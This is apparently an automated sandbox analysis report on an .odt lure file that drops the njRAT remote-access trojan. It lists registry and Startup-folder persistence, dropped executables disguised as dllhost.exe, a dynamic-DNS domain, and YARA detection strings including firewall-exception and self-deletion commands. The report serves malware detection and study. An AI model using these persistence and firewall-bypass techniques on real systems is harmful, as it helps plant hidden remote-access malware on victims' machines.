19:56:15API Interceptor2x Sleep call for process: exploit.exe modified
19:56:24API Interceptor5x Sleep call for process: netsh.exe modified
19:56:26AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run bde52a20d668d6f304b9db902c7cfc6b "C:\Users\user\AppData\Local\Temp\dllhost.exe" ..
19:56:34AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run bde52a20d668d6f304b9db902c7cfc6b "C:\Users\user\AppData\Local\Temp\dllhost.exe" ..
19:56:42AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
AutoformLiscence bls activation.odt29%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\exploit.exe100%AviraTR/Dropper.Gen7
C:\Users\user\AppData\Local\Temp\dllhost.exe100%AviraTR/Dropper.Gen7
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe100%AviraTR/Dropper.Gen7
C:\Users\user\AppData\Local\Temp\exploit.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\dllhost.exe100%Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe100%Joe Sandbox ML

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
16.0.dllhost.exe.210000.0.unpack100%AviraTR/Dropper.Gen7Download File
10.2.exploit.exe.1d0000.0.unpack100%AviraTR/Dropper.Gen7Download File
11.0.dllhost.exe.210000.0.unpack100%AviraTR/Dropper.Gen7Download File
15.0.dllhost.exe.210000.0.unpack100%AviraTR/Dropper.Gen7Download File
11.2.dllhost.exe.210000.0.unpack100%AviraTR/Dropper.Gen7Download File
10.0.exploit.exe.1d0000.0.unpack100%AviraTR/Dropper.Gen7Download File
15.2.dllhost.exe.210000.0.unpack100%AviraTR/Dropper.Gen7Download File
16.2.dllhost.exe.210000.0.unpack100%AviraTR/Dropper.Gen7Download File

Domains

SourceDetectionScannerLabelLink
amibas8722.ddns.net6%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://www.%s.comPA0%Avira URL Cloudsafe
http://www.%s.comPA0%Google Safe Browsingsafe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\exploit.exeCN_disclosed_20180208_c_RID2E71Detects malware from disclosed CN malware setFlorian Roth
  • 0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del "
  • 0x4e86:$s3: Executed As
  • 0x4e68:$s6: Download ERROR
C:\Users\user\AppData\Local\Temp\exploit.exeNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
  • 0x4d6c:$reg: SEE_MASK_NOZONECHECKS
  • 0x4e44:$msg: Execute ERROR
  • 0x4ea0:$msg: Execute ERROR
  • 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
C:\Users\user\AppData\Local\Temp\exploit.exenjrat1Identify njRatBrian Wallace @botnet_hunter
  • 0x4d9c:$a1: netsh firewall add allowedprogram
  • 0x4d6c:$a2: SEE_MASK_NOZONECHECKS
  • 0x5016:$b1: [TAP]
  • 0x4d2e:$c3: cmd.exe /c ping
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exeCN_disclosed_20180208_c_RID2E71Detects malware from disclosed CN malware setFlorian Roth
  • 0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del "
  • 0x4e86:$s3: Executed As
  • 0x4e68:$s6: Download ERROR
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exeNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
  • 0x4d6c:$reg: SEE_MASK_NOZONECHECKS
  • 0x4e44:$msg: Execute ERROR
  • 0x4ea0:$msg: Execute ERROR
  • 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exenjrat1Identify njRatBrian Wallace @botnet_hunter
  • 0x4d9c:$a1: netsh firewall add allowedprogram
  • 0x4d6c:$a2: SEE_MASK_NOZONECHECKS
  • 0x5016:$b1: [TAP]
  • 0x4d2e:$c3: cmd.exe /c ping
C:\Users\user\AppData\Local\Temp\dllhost.exeCN_disclosed_20180208_c_RID2E71Detects malware from disclosed CN malware setFlorian Roth
  • 0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del "
  • 0x4e86:$s3: Executed As
  • 0x4e68:$s6: Download ERROR
C:\Users\user\AppData\Local\Temp\dllhost.exeNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
  • 0x4d6c:$reg: SEE_MASK_NOZONECHECKS
  • 0x4e44:$msg: Execute ERROR
  • 0x4ea0:$msg: Execute ERROR
  • 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
C:\Users\user\AppData\Local\Temp\dllhost.exenjrat1Identify njRatBrian Wallace @botnet_hunter
  • 0x4d9c:$a1: netsh firewall add allowedprogram
  • 0x4d6c:$a2: SEE_MASK_NOZONECHECKS
  • 0x5016:$b1: [TAP]
  • 0x4d2e:$c3: cmd.exe /c ping

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000000.515356796.001D2000.00000020.00020000.sdmpNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
  • 0x4b6c:$reg: SEE_MASK_NOZONECHECKS
  • 0x4c44:$msg: Execute ERROR
  • 0x4ca0:$msg: Execute ERROR
  • 0x4b2e:$ping: cmd.exe /c ping 0 -n 2 & del
0000000A.00000000.515356796.001D2000.00000020.00020000.sdmpnjrat1Identify njRatBrian Wallace @botnet_hunter
  • 0x4b9c:$a1: netsh firewall add allowedprogram
  • 0x4b6c:$a2: SEE_MASK_NOZONECHECKS
  • 0x4e16:$b1: [TAP]
  • 0x4b2e:$c3: cmd.exe /c ping
00000009.00000002.520219680.023FF000.00000004.00000001.sdmpNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
  • 0x11172:$reg: SEE_MASK_NOZONECHECKS
  • 0x162c1:$reg: SEE_MASK_NOZONECHECKS
  • 0x1124a:$msg: Execute ERROR
  • 0x112a6:$msg: Execute ERROR
  • 0x16399:$msg: Execute ERROR
  • 0x163f5:$msg: Execute ERROR
  • 0x11134:$ping: cmd.exe /c ping 0 -n 2 & del
  • 0x16283:$ping: cmd.exe /c ping 0 -n 2 & del
00000009.00000002.520219680.023FF000.00000004.00000001.sdmpnjrat1Identify njRatBrian Wallace @botnet_hunter
  • 0x111a2:$a1: netsh firewall add allowedprogram
  • 0x162f1:$a1: netsh firewall add allowedprogram
  • 0x11172:$a2: SEE_MASK_NOZONECHECKS
  • 0x162c1:$a2: SEE_MASK_NOZONECHECKS
  • 0x1141c:$b1: [TAP]
  • 0x1656b:$b1: [TAP]
  • 0x11134:$c3: cmd.exe /c ping
  • 0x16283:$c3: cmd.exe /c ping
0000000A.00000002.535195631.01905000.00000004.00000001.sdmpNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
  • 0x1068:$reg: SEE_MASK_NOZONECHECKS
  • 0x711c:$reg: SEE_MASK_NOZONECHECKS
  • 0x71f4:$msg: Execute ERROR
  • 0x7250:$msg: Execute ERROR
  • 0x70de:$ping: cmd.exe /c ping 0 -n 2 & del
0000000A.00000002.535195631.01905000.00000004.00000001.sdmpnjrat1Identify njRatBrian Wallace @botnet_hunter
  • 0x10b8:$a1: netsh firewall add allowedprogram
  • 0x714c:$a1: netsh firewall add allowedprogram
  • 0x1068:$a2: SEE_MASK_NOZONECHECKS
  • 0x711c:$a2: SEE_MASK_NOZONECHECKS
  • 0x73c6:$b1: [TAP]
  • 0x70de:$c3: cmd.exe /c ping
0000000F.00000000.586989058.00212000.00000020.00020000.sdmpNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
  • 0x4b6c:$reg: SEE_MASK_NOZONECHECKS
  • 0x4c44:$msg: Execute ERROR
  • 0x4ca0:$msg: Execute ERROR
  • 0x4b2e:$ping: cmd.exe /c ping 0 -n 2 & del
0000000F.00000000.586989058.00212000.00000020.00020000.sdmpnjrat1Identify njRatBrian Wallace @botnet_hunter
  • 0x4b9c:$a1: netsh firewall add allowedprogram
  • 0x4b6c:$a2: SEE_MASK_NOZONECHECKS
  • 0x4e16:$b1: [TAP]
  • 0x4b2e:$c3: cmd.exe /c ping
00000010.00000002.610854599.00212000.00000020.00020000.sdmpNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
  • 0x4b6c:$reg: SEE_MASK_NOZONECHECKS
  • 0x4c44:$msg: Execute ERROR
  • 0x4ca0:$msg: Execute ERROR
  • 0x4b2e:$ping: cmd.exe /c ping 0 -n 2 & del
00000010.00000002.610854599.00212000.00000020.00020000.sdmpnjrat1Identify njRatBrian Wallace @botnet_hunter
  • 0x4b9c:$a1: netsh firewall add allowedprogram
  • 0x4b6c:$a2: SEE_MASK_NOZONECHECKS
  • 0x4e16:$b1: [TAP]
  • 0x4b2e:$c3: cmd.exe /c ping
0000000F.00000002.600191296.00212000.00000020.00020000.sdmpNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
  • 0x4b6c:$reg: SEE_MASK_NOZONECHECKS
  • 0x4c44:$msg: Execute ERROR
  • 0x4ca0:$msg: Execute ERROR
  • 0x4b2e:$ping: cmd.exe /c ping 0 -n 2 & del
0000000F.00000002.600191296.00212000.00000020.00020000.sdmpnjrat1Identify njRatBrian Wallace @botnet_hunter
  • 0x4b9c:$a1: netsh firewall add allowedprogram
  • 0x4b6c:$a2: SEE_MASK_NOZONECHECKS
  • 0x4e16:$b1: [TAP]
  • 0x4b2e:$c3: cmd.exe /c ping
0000000B.00000000.533213752.00212000.00000020.00020000.sdmpNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
  • 0x4b6c:$reg: SEE_MASK_NOZONECHECKS
  • 0x4c44:$msg: Execute ERROR
  • 0x4ca0:$msg: Execute ERROR
  • 0x4b2e:$ping: cmd.exe /c ping 0 -n 2 & del
0000000B.00000000.533213752.00212000.00000020.00020000.sdmpnjrat1Identify njRatBrian Wallace @botnet_hunter
  • 0x4b9c:$a1: netsh firewall add allowedprogram
  • 0x4b6c:$a2: SEE_MASK_NOZONECHECKS
  • 0x4e16:$b1: [TAP]
  • 0x4b2e:$c3: cmd.exe /c ping
00000010.00000000.597361125.00212000.00000020.00020000.sdmpNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
  • 0x4b6c:$reg: SEE_MASK_NOZONECHECKS
  • 0x4c44:$msg: Execute ERROR
  • 0x4ca0:$msg: Execute ERROR
  • 0x4b2e:$ping: cmd.exe /c ping 0 -n 2 & del
00000010.00000000.597361125.00212000.00000020.00020000.sdmpnjrat1Identify njRatBrian Wallace @botnet_hunter
  • 0x4b9c:$a1: netsh firewall add allowedprogram
  • 0x4b6c:$a2: SEE_MASK_NOZONECHECKS
  • 0x4e16:$b1: [TAP]
  • 0x4b2e:$c3: cmd.exe /c ping
0000000B.00000002.756194496.00212000.00000020.00020000.sdmpNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
  • 0x4b6c:$reg: SEE_MASK_NOZONECHECKS
  • 0x4c44:$msg: Execute ERROR
  • 0x4ca0:$msg: Execute ERROR
  • 0x4b2e:$ping: cmd.exe /c ping 0 -n 2 & del
0000000B.00000002.756194496.00212000.00000020.00020000.sdmpnjrat1Identify njRatBrian Wallace @botnet_hunter
  • 0x4b9c:$a1: netsh firewall add allowedprogram
  • 0x4b6c:$a2: SEE_MASK_NOZONECHECKS
  • 0x4e16:$b1: [TAP]
  • 0x4b2e:$c3: cmd.exe /c ping
0000000A.00000002.533586619.001D2000.00000020.00020000.sdmpNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
  • 0x4b6c:$reg: SEE_MASK_NOZONECHECKS
  • 0x4c44:$msg: Execute ERROR
  • 0x4ca0:$msg: Execute ERROR
  • 0x4b2e:$ping: cmd.exe /c ping 0 -n 2 & del
0000000A.00000002.533586619.001D2000.00000020.00020000.sdmpnjrat1Identify njRatBrian Wallace @botnet_hunter
  • 0x4b9c:$a1: netsh firewall add allowedprogram
  • 0x4b6c:$a2: SEE_MASK_NOZONECHECKS
  • 0x4e16:$b1: [TAP]
  • 0x4b2e:$c3: cmd.exe /c ping

Unpacked PEs

SourceRuleDescriptionAuthorStrings
11.0.dllhost.exe.210000.0.unpackCN_disclosed_20180208_c_RID2E71Detects malware from disclosed CN malware setFlorian Roth
  • 0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del "
  • 0x4e86:$s3: Executed As
  • 0x4e68:$s6: Download ERROR
10.2.exploit.exe.1d0000.0.unpackCN_disclosed_20180208_c_RID2E71Detects malware from disclosed CN malware setFlorian Roth
  • 0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del "
  • 0x4e86:$s3: Executed As
  • 0x4e68:$s6: Download ERROR
11.0.dllhost.exe.210000.0.unpackNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
  • 0x4d6c:$reg: SEE_MASK_NOZONECHECKS
  • 0x4e44:$msg: Execute ERROR
  • 0x4ea0:$msg: Execute ERROR
  • 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
10.2.exploit.exe.1d0000.0.unpackNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
  • 0x4d6c:$reg: SEE_MASK_NOZONECHECKS
  • 0x4e44:$msg: Execute ERROR
  • 0x4ea0:$msg: Execute ERROR
  • 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
11.0.dllhost.exe.210000.0.unpacknjrat1Identify njRatBrian Wallace @botnet_hunter
  • 0x4d9c:$a1: netsh firewall add allowedprogram
  • 0x4d6c:$a2: SEE_MASK_NOZONECHECKS
  • 0x5016:$b1: [TAP]
  • 0x4d2e:$c3: cmd.exe /c ping
10.2.exploit.exe.1d0000.0.unpacknjrat1Identify njRatBrian Wallace @botnet_hunter
  • 0x4d9c:$a1: netsh firewall add allowedprogram
  • 0x4d6c:$a2: SEE_MASK_NOZONECHECKS
  • 0x5016:$b1: [TAP]
  • 0x4d2e:$c3: cmd.exe /c ping
16.0.dllhost.exe.210000.0.unpackCN_disclosed_20180208_c_RID2E71Detects malware from disclosed CN malware setFlorian Roth
  • 0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del "
  • 0x4e86:$s3: Executed As
  • 0x4e68:$s6: Download ERROR
16.0.dllhost.exe.210000.0.unpackNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
  • 0x4d6c:$reg: SEE_MASK_NOZONECHECKS
  • 0x4e44:$msg: Execute ERROR
  • 0x4ea0:$msg: Execute ERROR
  • 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
16.0.dllhost.exe.210000.0.unpacknjrat1Identify njRatBrian Wallace @botnet_hunter
  • 0x4d9c:$a1: netsh firewall add allowedprogram
  • 0x4d6c:$a2: SEE_MASK_NOZONECHECKS
  • 0x5016:$b1: [TAP]
  • 0x4d2e:$c3: cmd.exe /c ping
15.0.dllhost.exe.210000.0.unpackCN_disclosed_20180208_c_RID2E71Detects malware from disclosed CN malware setFlorian Roth
  • 0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del "
  • 0x4e86:$s3: Executed As
  • 0x4e68:$s6: Download ERROR
15.0.dllhost.exe.210000.0.unpackNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
  • 0x4d6c:$reg: SEE_MASK_NOZONECHECKS
  • 0x4e44:$msg: Execute ERROR
  • 0x4ea0:$msg: Execute ERROR
  • 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
15.0.dllhost.exe.210000.0.unpacknjrat1Identify njRatBrian Wallace @botnet_hunter
  • 0x4d9c:$a1: netsh firewall add allowedprogram
  • 0x4d6c:$a2: SEE_MASK_NOZONECHECKS
  • 0x5016:$b1: [TAP]
  • 0x4d2e:$c3: cmd.exe /c ping
11.2.dllhost.exe.210000.0.unpackCN_disclosed_20180208_c_RID2E71Detects malware from disclosed CN malware setFlorian Roth
  • 0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del "
  • 0x4e86:$s3: Executed As
  • 0x4e68:$s6: Download ERROR
11.2.dllhost.exe.210000.0.unpackNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
  • 0x4d6c:$reg: SEE_MASK_NOZONECHECKS
  • 0x4e44:$msg: Execute ERROR
  • 0x4ea0:$msg: Execute ERROR
  • 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
11.2.dllhost.exe.210000.0.unpacknjrat1Identify njRatBrian Wallace @botnet_hunter
  • 0x4d9c:$a1: netsh firewall add allowedprogram
  • 0x4d6c:$a2: SEE_MASK_NOZONECHECKS
  • 0x5016:$b1: [TAP]
  • 0x4d2e:$c3: cmd.exe /c ping
10.0.exploit.exe.1d0000.0.unpackCN_disclosed_20180208_c_RID2E71Detects malware from disclosed CN malware setFlorian Roth
  • 0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del "
  • 0x4e86:$s3: Executed As
  • 0x4e68:$s6: Download ERROR
10.0.exploit.exe.1d0000.0.unpackNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
  • 0x4d6c:$reg: SEE_MASK_NOZONECHECKS
  • 0x4e44:$msg: Execute ERROR
  • 0x4ea0:$msg: Execute ERROR
  • 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
10.0.exploit.exe.1d0000.0.unpacknjrat1Identify njRatBrian Wallace @botnet_hunter
  • 0x4d9c:$a1: netsh firewall add allowedprogram
  • 0x4d6c:$a2: SEE_MASK_NOZONECHECKS
  • 0x5016:$b1: [TAP]
  • 0x4d2e:$c3: cmd.exe /c ping
16.2.dllhost.exe.210000.0.unpackCN_disclosed_20180208_c_RID2E71Detects malware from disclosed CN malware setFlorian Roth
  • 0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del "
  • 0x4e86:$s3: Executed As
  • 0x4e68:$s6: Download ERROR
16.2.dllhost.exe.210000.0.unpackNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
  • 0x4d6c:$reg: SEE_MASK_NOZONECHECKS
  • 0x4e44:$msg: Execute ERROR
  • 0x4ea0:$msg: Execute ERROR
  • 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
16.2.dllhost.exe.210000.0.unpacknjrat1Identify njRatBrian Wallace @botnet_hunter
  • 0x4d9c:$a1: netsh firewall add allowedprogram
  • 0x4d6c:$a2: SEE_MASK_NOZONECHECKS
  • 0x5016:$b1: [TAP]
  • 0x4d2e:$c3: cmd.exe /c ping
15.2.dllhost.exe.210000.0.unpackCN_disclosed_20180208_c_RID2E71Detects malware from disclosed CN malware setFlorian Roth
  • 0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del "
  • 0x4e86:$s3: Executed As
  • 0x4e68:$s6: Download ERROR
15.2.dllhost.exe.210000.0.unpackNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
  • 0x4d6c:$reg: SEE_MASK_NOZONECHECKS
  • 0x4e44:$msg: Execute ERROR
  • 0x4ea0:$msg: Execute ERROR
  • 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
15.2.dllhost.exe.210000.0.unpacknjrat1Identify njRatBrian Wallace @botnet_hunter
  • 0x4d9c:$a1: netsh firewall add allowedprogram
  • 0x4d6c:$a2: SEE_MASK_NOZONECHECKS
  • 0x5016:$b1: [TAP]
  • 0x4d2e:$c3: cmd.exe /c ping

Joe Sandbox View / Context

IPs

No context

Domains

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
a.top4top.netInfo.docGet hashmaliciousBrowse
  • 51.15.9.13

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
unknownInvoice0186.pdfGet hashmaliciousBrowse
  • 192.168.0.40
P_2038402.xlsxGet hashmaliciousBrowse
  • 192.168.0.44
bad.pdfGet hashmaliciousBrowse
  • 192.168.0.44
RFQ.pdfGet hashmaliciousBrowse
  • 192.168.0.44
100323.pdfGet hashmaliciousBrowse
  • 192.168.0.44
Copy.pdfGet hashmaliciousBrowse
  • 127.0.0.1
2.exeGet hashmaliciousBrowse
  • 192.168.0.40
UPPB502981.docGet hashmaliciousBrowse
  • 192.168.0.44
Adm_Boleto.via2.comGet hashmaliciousBrowse
  • 192.168.0.40
00ECF4AD.exeGet hashmaliciousBrowse
  • 192.168.0.40
PDF_100987464500.exeGet hashmaliciousBrowse
  • 192.168.0.40
filedata.exeGet hashmaliciousBrowse
  • 192.168.0.40
.exeGet hashmaliciousBrowse
  • 192.168.1.60
33redacted@threatwave.comGet hashmaliciousBrowse
  • 192.168.1.71

JA3 Fingerprints

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
05af1f5ca1b87cc9cc9b25185115607dYour_Purchase_4396143.xlsGet hashmaliciousBrowse
  • 163.172.46.38
Bofa_Charge01312019.xlsmGet hashmaliciousBrowse
  • 163.172.46.38
C_ACH_02042019.xlsmGet hashmaliciousBrowse
  • 163.172.46.38
C_ACH_02042019.xlsmGet hashmaliciousBrowse
  • 163.172.46.38
14308278291.xlsmGet hashmaliciousBrowse
  • 163.172.46.38
FILEY595000383.docGet hashmaliciousBrowse
  • 163.172.46.38
FILEY595000383.docGet hashmaliciousBrowse
  • 163.172.46.38
PO53473.docGet hashmaliciousBrowse
  • 163.172.46.38
Facture_Num_OFH30703.docGet hashmaliciousBrowse
  • 163.172.46.38
DOK97159672110.docGet hashmaliciousBrowse
  • 163.172.46.38
vXZa4D4m4V.xlsGet hashmaliciousBrowse
  • 163.172.46.38
Prepared_Purchase_Info_429458.docGet hashmaliciousBrowse
  • 163.172.46.38
1704007#U682a#U5f0f#U4f1a#U793e04082.xlsGet hashmaliciousBrowse
  • 163.172.46.38
62918504564317 .xlsGet hashmaliciousBrowse
  • 163.172.46.38
571275114140SS .xlsGet hashmaliciousBrowse
  • 163.172.46.38
Documento.FT.60803.modifiche_societarie.xlsGet hashmaliciousBrowse
  • 163.172.46.38
Documento_081507_FT_20190415_0006009_.xlsGet hashmaliciousBrowse
  • 163.172.46.38
Documento_057496_FT_20190415_0005008_.xlsGet hashmaliciousBrowse
  • 163.172.46.38
Scanmalta Client Invoice Statements.xlsGet hashmaliciousBrowse
  • 163.172.46.38
fee-docs.docGet hashmaliciousBrowse
  • 163.172.46.38

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.